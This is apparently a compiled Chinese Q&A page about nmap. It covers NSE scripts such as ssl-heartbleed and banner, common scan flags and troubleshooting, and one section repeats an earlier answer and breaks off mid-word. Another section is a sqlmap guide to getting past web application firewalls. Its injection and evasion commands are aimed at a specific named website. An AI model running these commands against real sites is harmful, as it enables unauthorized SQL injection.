nse脚本

‘壹’ ubuntu nmap漏洞怎么用

nmap是linux平台上的漏洞扫描利器，你可以看一下这款软件的说明。
比如在使用nmap 的过程中指定 ssl-heartbleed.nse 脚本来扫描探测，命令如下;
[[email protected] ~]#nmap -sV -p 443 --script=ssl-heartbleed.nse 192.168.1.5
或者
[[email protected] ~]#nmap -sV -p 443 --script=ssl-heartbleed 192.168.1.5
解释;其中 192.168.1.5 是要被扫描的ip，也可以换成域名

‘贰’ kali Linux 中使用nmap。

使用 nmap 的第一步是登录 Kali Linux，如果需要，就启动一个图形会话（本系列的第一篇文章安装了 Kali Linux 的 Enlightenment 桌面环境）。

在安装过程中，安装程序将提示用户输入用来登录的“root”用户和密码。 一旦登录到 Kali Linux 机器，使用命令startx就可以启动 Enlightenment 桌面环境 - 值得注意的是 nmap 不需要运行桌面环境。

# startx

Nmap – 在主机上完成网络扫描

注意这一次，使用一个命令，nmap 返回了很多关于在这台特定机器上运行的开放端口、服务和配置的信息。 这些信息中的大部分可用于帮助确定如何保护本机以及评估网络上可能运行的软件。

这只是 nmap 可用于在主机或网段上找到的许多有用信息的很短的一个列表。

扫描目的主机防火墙是否关闭。没开防火墙的：可以看到988个端口关闭，所以没有打开防火墙。

开了防火墙的：可以看到983个被过滤的端口，所以打开了防火墙。

输入“nmap+空格+域名或IP地址”进行的扫描时普通速度的扫描，时间较长。

输入“nmap”+“空格”+“-F”+空格+“域名或IP地址”，进行的是加速扫描，时间较短。

同时扫描多个ip方法一：输入“nmap+空格+IP地址段”。

输入“nmap+空格+IP/子网段”。


输入“nmap+空格+IP网络号+通配符*”。


扫描主机操作系统版本：输入“nmap+空格+“-O”+空格+IP地址或域名。


扫描所有TCP端口：输入“nmap+空格+“-sT”+空格+IP地址或域名”


扫描所有开放的UDP端口：输入“nmap+空格+“-sU”+空格+IP地址或域名”


扫描防火墙安全漏洞：输入“nmap+“-sN”+空格+IP地址或域名”


扫描使用IP协议的端口：输入“nmap+空格+“-sO”+空格+IP地址或域名“


侦测各种远程服务的版本号：输入”nmap+空格+”sV”+空格+IP地址或域名”

扫描最常用的TCP端口：输入“nmap+空格+”-sS”+空格+IP地址或域名”

扫描网段中活跃的主机：输入“nmap+空格+”-sP”+空格+IP地址段

综合扫描：输入“nmap+空格+”-A”+IP地址或域名

建议看看《Linux就该这么学》这本书

‘叁’ 使用nmap进行扫描时，需要注意的问题是什么

NSE 是nmap 脚本引擎的意思。NSE: Loaded 106 scripts for scanning. 意思是你导入了 106个lua脚本，一定是某个lua脚本中做了ARP扫描，nexthost: Failed to determine dst MAC address for target ####（这里是ip）这个错误应该是有ARP扫描的脚本错误造成的。

你首先检测一下，不要使用lua脚本看看有没有问题。比如说nmap -T4 -sT 127.0.0.1 如果不报错，那就是lua脚本的问题。
如果你一定要学习lua脚本在NSE中的使用，你不要一次导入所有的脚本，一个一个事实。或者使用-vv 参数看一下详细的日志情况。

‘肆’ 利用sqlmap注入时，发现站点对空格进行了过滤，可以使用什么脚本来绕过

0x00 前言
现在的网络环境往往是WAF/IPS/IDS保护着Web 服务器等等，这种保护措施往往会过滤挡住我们的SQL注入查询链接，甚至封锁我们的主机IP，所以这个时候，我们就要考虑怎样进行绕过，达到注入的目标。因为现在WAF/IPS/IDS都把sqlmap 列入黑名单了，呵呵！但是本文基于sqlmap 进行绕过注入测试，介绍至今仍然实用有效的技巧，以下策略在特定的环境能够成功绕过，具体是否绕过，请仔细查看输出的信息。
0x01 确认WAF
首先我们判断该Web 服务器是否被WAF/IPS/IDS保护着。这点很容易实现，因为我们在漏扫或者使用专门工具来检测是否有WAF，这个检测，在nmap 的NSE，或者WVS的策略或者APPSCAN的策略中都有，我们可以利用这些来判断。在此我们，也介绍使用sqlmap 进行检测是否有WAF/IPS/IDS
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --thread 10 --identify-waf#首选
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --thread 10 --check-waf#备选
0x02 使用参数进行绕过
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --random-agent -v 2 #使用任意浏览器进行绕过，尤其是在WAF配置不当的时候
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --hpp -v 3#使用HTTP 参数污染进行绕过，尤其是在ASP.NET/IIS 平台上
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=3.5 --time-sec=60 #使用长的延时来避免触发WAF的机制，这方式比较耗时
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --proxy=211.211.211.211:8080 --proxy-cred=211:985#使用代理进行注入

‘伍’ nmap使用求助

NSE 是nmap 脚本引擎的意思。NSE: Loaded 106 scripts for scanning. 意思是你导入了 106个lua脚本，一定是某个lua脚本中做了ARP扫描，nexthost: Failed to determine dst MAC address for target ####（这里是ip）这个错误应该是有ARP扫描的脚

‘陆’ banner是什么，nmap里的。这句话什么意思

这个问题要分,三步回答：
1，--script= 后面的参数名字，其实是文件名，文件在nmap的安装目录里面比如说我的:C:\Program Files (x86)\Nmap\scripts，这个目录里面的文件。banner 就是banner.nse。nse就是nmap脚本引擎的意思(nmap script engine)，作用是nmap使用lua脚本，对nmap的扩展。可以用nse脚本来构造自己的数据报文或者处理返回值。
2，banner是标志的意识，就是你访问ftp的服务器的时候服务器返回给你的标题，banner扫描作用如下：
A simple banner grabber which connects to an open TCP port and prints out anything sent by the listening service within five seconds.

The banner will be truncated to fit into a single line, but an extra line may be printed for every
increase in the level of verbosity requested on the command line.
3，nmap -p 21 -sV --script=banner 192.168.1.111 的意思是：扫描192.168.1.111这个机器上的
21号端口的服务器版本，并且使用 banner脚本来优化展示方式。